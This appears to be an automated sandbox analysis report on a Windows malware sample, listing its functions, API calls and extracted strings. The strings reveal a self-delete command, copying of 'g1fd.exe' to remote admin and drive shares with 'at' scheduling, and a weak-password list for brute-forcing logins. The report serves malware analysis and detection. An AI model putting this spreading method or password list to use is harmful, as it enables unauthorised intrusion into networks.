                                Function 0040355B Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 117threadlibraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00403571
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00403578
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                • SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                • GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                • SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                • GetCurrentThread.KERNEL32 ref: 0040369B
                                • SetThreadPriority.KERNEL32(00000000), ref: 004036A2
                                • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Priority$ClassCurrentNameThread$ChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcessShellShortVariable
                                • String ID: > nul$/c del $<$COMSPEC$KERNEL32.dll$O$e$lstrcatA$n$p
                                • API String ID: 3031387768-2260071220
                                • Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
                                • Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64
                                Function 00406A48 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                • String ID:
                                • API String ID: 801014965-0
                                • Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
                                • Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18
                                Function 0040604D Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 76 40604d-406053 77 406061-406067 76->77 78 406055 76->78 79 406075-40607b 77->79 80 406069 77->80 78->77 81 406089-40608e call 40355b 79->81 82 40607d-406083 RegCloseKey 79->82 80->79 82->81
                                APIs
                                • RegCloseKey.KERNEL32(?,0040603C), ref: 00406083
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
                                • Instruction ID: 1f8c146e6fe937cb65407d64c7b6e595c96462481ae191be37c374c023957cce
                                • Opcode Fuzzy Hash: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
                                • Instruction Fuzzy Hash: D9E00235C512699BCF72AF54CC8869DBA79AF00302F5501FAB10D781608B392FD0DE04

                                Non-executed Functions

                                Function 00406090 Relevance: 140.5, APIs: 46, Strings: 34, Instructions: 522librarystringregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 534 406090-40623a LoadLibraryA 6CFC6DE0 LoadLibraryA 6CFC6DE0 GetSystemDefaultUILanguage memset 536 40625c-406263 534->536 537 40623c-406259 _mbscpy 534->537 538 406265-40626c 536->538 539 40628b-406292 536->539 537->536 538->539 540 40626e-406288 _mbscpy 538->540 541 406294-40629b 539->541 542 4062bd-4062c4 539->542 540->539 541->542 543 40629d-4062ba _mbscpy 541->543 544 4062c6-4062cd 542->544 545 4062ef-4062f6 542->545 543->542 544->545 546 4062cf-4062ec _mbscpy 544->546 547 4062f8-4062ff 545->547 548 40634d-406354 545->548 546->545 547->548 549 406301-40630c 547->549 550 406356-40635d 548->550 551 4063ac-4063b3 548->551 552 40632d-40634a _mbscpy 549->552 553 40630e-40632b _mbscpy 549->553 550->551 554 40635f-40636b 550->554 555 4063b5-4063bc 551->555 556 40640e-406415 551->556 552->548 553->548 557 40638c-4063a9 _mbscpy 554->557 558 40636d-40638a _mbscpy 554->558 555->556 559 4063be-4063ca 555->559 560 406440-406508 sprintf _mbscpy lstrcpy 556->560 561 406417-40641e 556->561 557->551 558->551 562 4063cc-4063ec _mbscpy 559->562 563 4063ee-40640b _mbscpy 559->563 566 4065d6-406652 _mbscpy 560->566 567 40650e-4065d4 RegQueryValueExA GetSystemInfo memset sprintf _mbscpy 560->567 561->560 564 406420-40643d _mbscpy 561->564 562->556 563->556 564->560 568 406655-4066e5 GlobalMemoryStatusEx call 4069e0 * 2 wsprintfA malloc GetAdaptersInfo 566->568 567->568 574 406704-406713 GetAdaptersInfo 568->574 575 4066e7-406701 free malloc 568->575 576 406953-406967 free 574->576 577 406719-40671d 574->577 575->574 578 406974-406986 576->578 579 406969-40696f GetTickCount 576->579 577->576 580 406723-40673b strcmp 577->580 579->578 581 406741-406781 GetIfTable 580->581 582 406946-40694e 580->582 581->582 583 406787-4067af ??2@YAPAXI@Z 581->583 582->577 583->582 584 4067b5-4067d7 GetIfTable 583->584 585 40692b-406943 ??3@YAXPAX@Z 584->585 586 4067dd-406806 584->586 585->582 586->585 588 40680c-406826 586->588 589 406926 588->589 590 40682c-406846 588->590 590->589 591 40684c-40686e 590->591 591->589 592 406874-4068af 591->592 593 4068f1-406923 sprintf _mbscpy 592->593 594 4068b1-4068ef sprintf _mbscpy 592->594 593->589 594->589
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,6CFC6DE0), ref: 004060A4
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004060AB
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004060C8
                                • GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                • memset.MSVCRT ref: 004060F2
                                • _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                • _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                • _mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
                                • _mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
                                • _mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
                                • _mbscpy.MSVCRT(0000005D,2008), ref: 00406345
                                • _mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
                                • _mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
                                • _mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
                                • _mbscpy.MSVCRT(0000005D,2012), ref: 00406406
                                • _mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
                                • sprintf.MSVCRT ref: 0040649C
                                • _mbscpy.MSVCRT(0000005D,?), ref: 004064B3
                                • lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
                                • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
                                • GetSystemInfo.KERNEL32(?), ref: 0040655F
                                • memset.MSVCRT ref: 00406570
                                • sprintf.MSVCRT ref: 004065B5
                                • _mbscpy.MSVCRT(-00000003,?), ref: 004065CC
                                • _mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
                                • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00406666
                                • __aulldiv.LIBCMT ref: 00406681
                                • __aulldiv.LIBCMT ref: 0040668F
                                • wsprintfA.USER32 ref: 004066B4
                                • malloc.MSVCRT ref: 004066C9
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
                                • free.MSVCRT ref: 004066EB
                                • malloc.MSVCRT ref: 004066F8
                                • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _mbscpy$Infosprintf$AdaptersLibraryLoadSystemTable__aulldivmallocmemset$??2@DefaultGlobalLanguageMemoryQueryStatusValuefreelstrcpystrcmpwsprintf
                                • String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
                                • API String ID: 2090821033-2163519892
                                • Opcode ID: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
                                • Instruction ID: 4060d5c4243dd63f8f5c6b2b41416773b41649e27dbdc5ec35ba0ab2f083b483
                                • Opcode Fuzzy Hash: ac664ac28b07310516338be58f7e88e6df9f99dd773c2a230ccc76c7ff13faf2
                                • Instruction Fuzzy Hash: 3B32B170904258DBEB21CB54CD48BDEBBB8AF15308F0440EDE14D7A291D7B99B98CF69
                                Function 00402AD0 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 249librarysleepprocessCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: sprintf$memset$LibraryLoad$Sleep$ExecFileLocalModuleNameTimelstrcmp
                                • String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$at \\%s %d:%d %s$lstrcpyA$mpr.dll
                                • API String ID: 1199448054-2568294205
                                • Opcode ID: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
                                • Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
                                • Opcode Fuzzy Hash: 5ffb21aadb17f97c53c336c2ac13193d748957f1a63aa5c8c87489ef83d6646d
                                • Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64
                                Function 00405244 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 86filelibrarystringCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405261
                                • FindResourceA.KERNEL32(?,?,?), ref: 00405272
                                • LoadResource.KERNEL32(?,00000000), ref: 00405291
                                • LockResource.KERNEL32(00000000), ref: 004052A9
                                • wsprintfA.USER32 ref: 004052C4
                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
                                • lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
                                • WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
                                • CloseHandle.KERNEL32(00000000), ref: 00405326
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResource$LoadWrite$CloseFindHandleLibraryLockPointerlstrlenwsprintf
                                • String ID: SizeofResource$hra%u.dll$kernel32.dll
                                • API String ID: 496033514-2774179399
                                • Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
                                • Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4
                                Function 0040351A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00403E70,Defghi Klmnopqr Tuv), ref: 00403523
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
                                • DeleteService.ADVAPI32(00000000), ref: 0040354C
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403556
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandleOpen$DeleteManager
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 204194956-1553144822
                                • Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
                                • Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9
                                Function 004036C6 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00403706
                                • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040371F
                                • recv.WS2_32(?,?,?,00000000), ref: 00403738
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID:
                                • API String ID: 741273618-0
                                • Opcode ID: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
                                • Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
                                • Opcode Fuzzy Hash: 08bfddc5926bdb291e585c6cb0e2000db50bccf36a18e5e6554a9c6016903237
                                • Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58
                                Function 004055BC Relevance: 126.2, APIs: 24, Strings: 48, Instructions: 204librarysleepthreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004055E1
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004055F4
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00405602
                                • Sleep.KERNEL32(000001F4), ref: 00405663
                                • LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004056F2
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040574D
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040578D
                                • exit.MSVCRT ref: 004057A7
                                • wsprintfA.USER32 ref: 004057D2
                                • CreateThread.KERNEL32(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
                                • Sleep.KERNEL32(000001F4), ref: 00405806
                                • WSAStartup.WS2_32(00000202,?), ref: 0040581E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
                                • WSAStartup.WS2_32(00000202,?), ref: 00405838
                                • CreateThread.KERNEL32(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
                                • CloseHandle.KERNEL32 ref: 00405865
                                • Sleep.KERNEL32(0000012C), ref: 00405883
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$CreateSleepThread$Startup$CloseHandleObjectSingleWaitexitwsprintf
                                • String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
                                • API String ID: 434866226-3768298475
                                • Opcode ID: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
                                • Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
                                • Opcode Fuzzy Hash: 3e8986f7b36fc184894d738f56119a721a27f0aa9eb4948b4fdc8215cfafe1d1
                                • Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A
                                Function 00405348 Relevance: 112.2, APIs: 21, Strings: 43, Instructions: 211librarymemoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040536E
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040537C
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040538E
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004053A0
                                • memset.MSVCRT ref: 00405483
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 0040551C
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405533
                                • GlobalFree.KERNEL32(?), ref: 00405540
                                • CloseHandle.KERNEL32(00000000), ref: 00405547
                                • CloseHandle.KERNEL32(00000000), ref: 00405552
                                • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
                                • UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
                                • lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
                                • UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
                                • EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
                                • GlobalFree.KERNEL32(?), ref: 004055AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadResourceUpdate$Global$CloseFileFreeHandle$AllocBeginReadSizelstrlenmemset
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 78893175-1497069993
                                • Opcode ID: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
                                • Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
                                • Opcode Fuzzy Hash: a172b0cc63db696c841bbe02ffd43a2cf52db66c145518108a5dfe1ce22702be
                                • Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79
                                Function 00402DD5 Relevance: 91.2, APIs: 8, Strings: 44, Instructions: 166networksleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 750 402dd5-402f90 call 402a59 753 402f96-402fc2 gethostname 750->753 754 4030f8-4030fa 750->754 755 402fc8-402fdc gethostbyname 753->755 756 4030ed-4030f7 WSACleanup 753->756 755->756 757 402fe2-402fe4 755->757 756->754 758 402fe7-402fed 757->758 758->756 759 402ff3-403035 memset memcpy 758->759 760 403036-40307f memset sprintf 759->760 761 403081 760->761 762 4030cb-4030db 760->762 764 403084-40308b 761->764 762->760 763 4030e1-4030e8 762->763 763->758 765 4030c4-4030c9 764->765 766 40308d 764->766 765->762 765->764 767 403093-4030a5 Sleep 766->767 768 4030c1 767->768 769 4030a7-4030bf call 402ad0 767->769 768->765 769->767 769->768
                                APIs
                                  • Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E
                                • gethostname.WS2_32(?,00000080), ref: 00402FBA
                                • gethostbyname.WS2_32(?), ref: 00402FCF
                                • memset.MSVCRT ref: 00402FFA
                                • memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
                                • memset.MSVCRT ref: 00403049
                                • sprintf.MSVCRT ref: 0040306F
                                • Sleep.KERNEL32(000000C8), ref: 00403098
                                • WSACleanup.WS2_32 ref: 004030ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
                                • String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
                                • API String ID: 2657193355-195746125
